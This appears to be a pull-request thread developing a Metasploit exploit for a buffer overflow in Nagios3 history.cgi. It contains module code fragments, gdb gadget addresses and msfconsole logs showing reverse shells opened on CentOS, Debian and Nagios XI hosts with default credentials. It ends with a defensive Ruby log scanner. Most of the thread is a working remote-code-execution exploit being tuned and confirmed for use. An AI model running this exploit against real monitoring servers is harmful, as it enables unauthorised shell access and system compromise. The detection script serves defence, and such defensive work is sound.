Nagios3 history.cgi exploit #1314
Conversation
It overlaps with #1313. I'll see what can be done.
require 'rex' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = ExcellentRanking |
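Review bot: `Rank = ExcellentRanking` is too high for this module at this stage: Metasploit reserves ExcellentRanking for exploits that cannot crash the service (command execution, injection), whereas this is a memory-corruption exploit whose early runs in this thread end with "No encoders encoded the buffer successfully" and "Unknown response" on the CentOS target. Lower it (GreatRanking or below) until every listed target is confirmed reliable, and revisit once the targets are verified.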
Prolly it doesn't fit the requirements for ExcellentRanking. We can redefine it once finished. Just pointing atm.
msf exploit(nagios3_history_cgi) > set RHOST 192.168.1.156
RHOST => 192.168.1.156
msf exploit(nagios3_history_cgi) > set URI /nagios/cgi-bin/history.cgi
URI => /nagios/cgi-bin/history.cgi
msf exploit(nagios3_history_cgi) > set USER nagiosadmin
USER => nagiosadmin
msf exploit(nagios3_history_cgi) > set PASS nagiosadmin
PASS => nagiosadmin
msf exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[-] Exploit failed: No encoders encoded the buffer successfully.

msf exploit(nagios3_history_cgi) > set target 1
target => 1
msf exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Selected Target: CentOS (nagios-3.4.3-1.el6.i686.rpm)
[*] Sending request to http://192.168.1.156:80/nagios/cgi-bin/history.cgi
[*] Unknown response
[*] 200
msf exploit(nagios3_history_cgi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target
   1   CentOS (nagios-3.4.3-1.el6.i686.rpm)
   2   Debian (nagios3_3.0.6-4~lenny2_i386.deb)

[root@localhost ~]# uname -a
Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
[root@localhost ~]# cat /etc/redhat-release
CentOS release 6.3 (Final)
[root@localhost ~]# rpm -qa | grep nagios
nagios-3.4.3-1.el6.i686

Testing the Debian target and digging into it, will update asap
register_options( | ||
[ | ||
OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), | ||
OptString.new('USER', [false, "The username to authenticate with", "guest"]), |
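Review bot: `URI` should be named `TARGETURI`, the conventional option name for HTTP exploit modules (the later runs in this thread already use `set TARGETURI`), and `USER` is registered as optional (`false`) even though the module cannot reach history.cgi unauthenticated and `check` later refuses to run without USER and PASS; mark it required. The "guest" default is also package-specific (the CentOS EPEL package ships `nagiosadmin` instead), so either drop the default or document where it applies.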
In my first installation of Nagios for CentOS, from the EPEL repo, there is a default nagiosadmin / nagiosadmin user, but not guest / guest; maybe it could be a good idea to switch to nagiosadmin / nagiosadmin by default. Not sure if guest / guest are common credentials in other default packages.
Working on it.
It's not working on Debian 5 / nagios3_3.0.6-4~lenny2_i386.deb either:

msf exploit(nagios3_history_cgi) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(nagios3_history_cgi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target
   1   CentOS (nagios-3.4.3-1.el6.i686.rpm)
   2   Debian (nagios3_3.0.6-4~lenny2_i386.deb)

msf exploit(nagios3_history_cgi) > set target 2
target => 2
msf exploit(nagios3_history_cgi) > set PASS nagiosadmin
PASS => nagiosadmin
msf exploit(nagios3_history_cgi) > set USER nagiosadmin
USER => nagiosadmin
msf exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Selected Target: Debian (nagios3_3.0.6-4~lenny2_i386.deb)
[*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi
[*] Unknown response

nagios:~# uname -a
Linux nagios 2.6.26-2-686 #1 SMP Sun Mar 4 22:19:19 UTC 2012 i686 GNU/Linux
nagios:~# cat /etc/debian_version
5.0.10
nagios:~# dpkg -l | grep nagios3
ii  nagios3        3.0.6-4~lenny2        A host/service/network monitoring and management system
(gdb) x/2i 0x08048fe4
0x8048fe4 : pop %ebp
0x8048fe5 : ret
(gdb) x/i 0x08048c7c
0x8048c7c : jmp *0x8071120

(gdb) x/2i 0x08048f04
0x8048f04 <__snprintf_chk@plt+12>: mov 0xfffffffc,%al
0x8048f09 : and $0x807d1c0,%eax
(gdb) x/i 0x08048bb0
0x8048bb0: call 0x80c9385
(gdb) x/i 0x08048e70
0x8048e70 : add %eax,(%eax)
(gdb)
Wrong history.cgi. There was a Nagios XI installation on the same box. Let me get the correct addresses for it.
If Nagios XI also uses a vulnerable history.cgi and you make it work, feel free to add it as a new target; more targets, more interesting exploit :) Please, only tested and confirmed targets! :)
@jvazquez-r7 this exploit works for me on Debian. I guess you have your nagios.log almost empty (or rotated). To reach the vulnerable code path you need to have at least a notification (or an alert, I don't know exactly) in your Try to kill apache for some minutes and then restart it... (localhost/http is monitored by default)

msf exploit(nagioscgi) > exploit
[*] Started reverse handler on 10.199.1.2:4444
meterpreter >
@danielemartini You're right. We need at least one alert in order to exploit the vulnerability.
Better :) I'm going to proceed with the final test, clean up by myself, credit you both and merge! Thanks very much @jselvi and @danielemartini for an awesome contribution! Great work!

msf exploit(nagios3_history_cgi) > set rhost 192.168.1.158
rhost => 192.168.1.158
msf exploit(nagios3_history_cgi) > set TARGETURI /nagios/cgi-bin/history.cgi
TARGETURI => /nagios/cgi-bin/history.cgi
msf exploit(nagios3_history_cgi) > reload
[*] Reloading module...
msf exploit(nagios3_history_cgi) > check
[*] Checking banner and version...
[-] Please specify correct values for USER and PASS
[-] No matching target
[*] Cannot reliably check exploitability.
msf exploit(nagios3_history_cgi) > set pass admin1234
pass => admin1234
msf exploit(nagios3_history_cgi) > check
[*] Checking banner and version...
[*] Web Server banner: Apache/2.2.15 (CentOS)
[*] Nagios version detected: 3.4.1
[+] The target is vulnerable.
msf exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Automatically detecting the target...
[*] Web Server banner: Apache/2.2.15 (CentOS)
[*] Nagios version detected: 3.4.1
[*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x)
[*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.158:44234) at 2013-01-16 10:24:46 +0100

id;
uid=48(apache) gid=48(apache) groups=48(apache),500(nagios),501(nagcmd)
^C
Abort session 2? [y/N]  y
[*] 192.168.1.158 - Command shell session 2 closed.  Reason: User exit
After some cleanup the exploit is working on both CentOS (Nagios XI appliance) and Debian, merging!

msf exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Automatically detecting the target...
[*] Web Server banner: Apache/2.2.9 (Debian)
[*] Nagios version detected: 3.0.6
[*] Selected Target: Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)
[*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.155:34974) at 2013-01-16 11:50:56 +0100

^C[-] Exploit failed: Interrupt
^C
Abort session 3? [y/N]  y
[*] 192.168.1.155 - Command shell session 3 closed.  Reason: User exit
msf exploit(nagios3_history_cgi) > set rhost 192.168.1.158
rhost => 192.168.1.158
msf exploit(nagios3_history_cgi) > set pass admin1234
pass => admin1234
msf exploit(nagios3_history_cgi) > set targeturi /nagios/cgi-bin/history.cgi
targeturi => /nagios/cgi-bin/history.cgi
msf exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Automatically detecting the target...
[*] Web Server banner: Apache/2.2.15 (CentOS)
[*] Nagios version detected: 3.4.1
[*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x)
[*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi
[*] Command shell session 4 opened (192.168.1.128:4444 -> 192.168.1.158:46001) at 2013-01-16 11:51:31 +0100

^C[-] Exploit failed: Interrupt
^C
Abort session 4? [y/N]  y
[*] 192.168.1.158 - Command shell session 4 closed.  Reason: User exit
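A defender-side complement to the runs above, added here as an example and not part of the module or this pull request: a small Ruby script that scans Apache combined-format access logs for requests to history.cgi whose query parameters are oversized or carry non-printable bytes, which is the shape of request an overflow attempt against this CGI leaves in the web server log. The sample log lines, the 256-byte per-parameter threshold and the history.cgi path filter are constructed assumptions for the illustration, not values taken from the module.

```ruby
# Added example (not from the pull request): flag suspicious requests to
# Nagios history.cgi in Apache combined-format access logs.
require 'uri'

# Assumptions for the illustration: which CGI to watch and how long a
# single decoded parameter may be before it is reported.
HISTORY_CGI   = %r{/history\.cgi\z}
MAX_PARAM_LEN = 256

# Apache "combined" format: client, ident, user, [time], "METHOD target PROTO", status, ...
LOG_RE = /\A(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3}) /

# Constructed sample log: the long and %-encoded host values are made up for the demo.
SAMPLE_LOG = [
  '192.168.1.128 - nagiosadmin [16/Jan/2013:10:24:40 +0100] "GET /nagios/cgi-bin/history.cgi?host=localhost&service=HTTP HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  "192.168.1.128 - nagiosadmin [16/Jan/2013:10:24:46 +0100] \"GET /nagios/cgi-bin/history.cgi?host=#{'A' * 1200} HTTP/1.1\" 500 0 \"-\" \"-\"",
  '192.168.1.128 - nagiosadmin [16/Jan/2013:10:24:47 +0100] "GET /nagios/cgi-bin/history.cgi?host=%90%90%90%cc HTTP/1.1" 500 0 "-" "-"',
  "192.168.1.128 - nagiosadmin [16/Jan/2013:10:24:48 +0100] \"GET /nagios/cgi-bin/status.cgi?host=#{'B' * 1200} HTTP/1.1\" 200 9000 \"-\" \"-\"",
  'this line is not in combined format and is skipped'
].join("\n") + "\n"

# Parse one access-log line into a hash, or nil when it is not combined format.
def parse_access_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  path, query = m[5].split('?', 2)
  { client: m[1], user: m[2], time: m[3], method: m[4],
    path: path, query: query || '', status: m[6].to_i }
end

# Percent-decode a parameter value; malformed encoding is kept raw so it is still inspected.
def decode_param(raw)
  URI.decode_www_form_component(raw)
rescue ArgumentError
  raw
end

# Report parameters whose decoded value is oversized or contains bytes outside printable ASCII.
def suspicious_params(query, max_len: MAX_PARAM_LEN)
  query.split('&').each_with_object([]) do |pair, out|
    name, raw = pair.split('=', 2)
    next if raw.nil?
    value   = decode_param(raw).b
    reasons = []
    reasons << "length #{value.bytesize} > #{max_len}" if value.bytesize > max_len
    reasons << 'non-printable bytes' if value.bytes.any? { |b| b < 0x20 || b > 0x7e }
    out << { param: name, reasons: reasons } unless reasons.empty?
  end
end

# Walk the log and return one finding per history.cgi request that trips a rule.
def scan_access_log(text)
  text.each_line.with_index(1).each_with_object([]) do |(line, lineno), out|
    entry = parse_access_line(line.chomp)
    next unless entry && entry[:path] =~ HISTORY_CGI
    hits = suspicious_params(entry[:query])
    out << entry.merge(line: lineno, findings: hits) unless hits.empty?
  end
end

if $PROGRAM_NAME == __FILE__
  scan_access_log(SAMPLE_LOG).each do |f|
    puts "line #{f[:line]}: #{f[:client]} #{f[:method]} #{f[:path]} status=#{f[:status]}"
    f[:findings].each { |h| puts "  #{h[:param]}: #{h[:reasons].join(', ')}" }
  end
end
```

On the constructed sample this reports lines 2 and 3 only: the oversized `host` value and the one carrying raw high bytes after decoding. The status.cgi request with an equally long parameter is deliberately ignored by the path filter, and the unparseable line is skipped rather than raising. In a real deployment the same two rules are cheap to express as a web server or WAF rule, and a 500 response on history.cgi paired with such a parameter is a strong signal that the overflow path was hit.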
Nagios3 history.cgi exploit. Based on blasty's working exploit (http://pastebin.com/FJUNyTaj) with an added CentOS target.